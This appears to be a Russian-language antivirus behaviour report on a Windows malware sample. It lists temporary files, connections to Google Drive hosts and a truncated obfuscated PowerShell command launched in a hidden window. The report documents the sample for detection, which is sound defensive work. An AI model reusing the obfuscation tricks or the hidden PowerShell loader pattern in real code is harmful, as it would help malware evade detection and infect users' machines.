Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\speljvendt192.txt
- %WINDIR%\temp\cabd3c3.tmp
- %WINDIR%\temp\tard3c4.tmp
- %WINDIR%\temp\cabd50d.tmp
- %WINDIR%\temp\tard50e.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cabd3c3.tmp
- %WINDIR%\temp\tard3c4.tmp
- %WINDIR%\temp\cabd50d.tmp
- %WINDIR%\temp\tard50e.tmp
Сетевая активность
Подключается к
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
UDP
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Quicksort Foejelighed Unmalled Firecifredes Stnkpropper Gummous #>;$Klapsets=(cmd /c set /A 115^^0);Function Temperaturmaalingernes ([String]$Markswomen){$Himmerland=8;$Lukningerne=Kontorlan...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Quicksort Foejelighed Unmalled Firecifredes Stnkpropper Gummous #>;$Klapsets=(cmd /c set /A 115^^0);Function Temperaturmaalingernes ([String]$Markswomen){$Himmerland=8;$Lukningerne=Kontorlan...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0
